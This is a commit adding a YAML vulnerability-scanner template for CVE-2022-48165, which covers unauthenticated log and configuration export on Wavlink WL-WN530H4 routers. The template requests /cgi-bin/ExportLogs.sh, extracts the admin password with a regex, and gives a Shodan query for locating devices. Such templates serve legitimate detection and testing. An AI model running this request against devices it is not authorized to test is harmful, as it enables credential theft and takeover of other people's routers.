Merge pull request #6680 from For3stCo1d/CVE-2022-48165

Create CVE-2022-48165.yaml
2023-03-02 16:10:58 +05:30 · 2023-03-02 16:10:58 +05:30 · 4241b82305
parent 774c2be888 a03702ec67
commit 4241b82305
1 changed files with 45 additions and 0 deletions
--- a/cves/2022/CVE-2022-48165.yaml
+++ b/cves/2022/CVE-2022-48165.yaml
@ -0,0 +1,45 @@
+id: CVE-2022-48165
+
+info:
+  name: Wavlink - Configuration Exposure
+  author: For3stCo1d
+  severity: high
+  description: |
+    An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
+  reference:
+    - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE
+    - https://twitter.com/For3stCo1d/status/1622576544190464000
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165
+    - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md
+  metadata:
+    verified: "true"
+    shodan-query: http.favicon.hash:-1350437236
+  tags: cve,cve2022,wavlink,router,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Password='
+          - 'Login='
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - filename="sysLogs.txt"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - 'Password=([^\s]+)'